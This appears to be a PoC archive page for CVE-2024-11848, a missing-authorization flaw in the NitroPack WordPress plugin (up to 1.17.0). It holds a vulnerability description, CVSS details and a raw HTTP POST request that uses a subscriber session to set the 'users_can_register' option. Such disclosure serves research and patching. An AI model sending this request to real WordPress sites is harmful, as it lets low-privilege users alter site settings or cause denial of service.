Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-11848 PoC — WordPress plugin NitroPack 安全漏洞

Source
Associated Vulnerability
Title:WordPress plugin NitroPack 安全漏洞 (CVE-2024-11848)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin NitroPack 1.17.0版本及之前版本存在安全漏洞,该漏洞源于缺少对“nitropack_dismiss_notice_forever”AJAX操作的功能检查。
Description
NitroPack <= 1.17.0 - Missing Authorization to Authenticated (Subscriber+) Limited Options Update
Readme
# CVE-2024-11848
NitroPack <= 1.17.0 - Missing Authorization to Authenticated (Subscriber+) Limited Options Update

# Description

The NitroPack plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'nitropack_dismiss_notice_forever' AJAX action in all versions up to, and including, 1.17.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary options to a fixed value of '1' which can activate certain options (e.g., enable user registration) or modify certain options in a way that leads to a denial of service condition.

## Details

- **Type**: plugin
- **Slug**: nitropack
- **Affected Version**: 1.17.0
- **CVSS Score**: 8.1
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
- **CVE**: CVE-2024-11848
- **Status**: Active

POC
---

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal:8929
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_f0174336378e6db874da2237e8c05ac1=subscriber%7C1737110766%7CYhdLxJv5qLyqmSVznKzPOC94NyU9PAMWPeef9cCtINN%7C8c6d11f15397dfb790e700f695c7480bb8267c86130c402afce6080076ccff2d
Content-Length: 88

action=nitropack_dismiss_notice_forever&security=92f60ea3ea&notice_id=users_can_register
```
File Snapshot

[4.0K] /data/pocs/cd07c0e849149fb1bde0eff15369ca4146ad3d95 └── [1.3K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.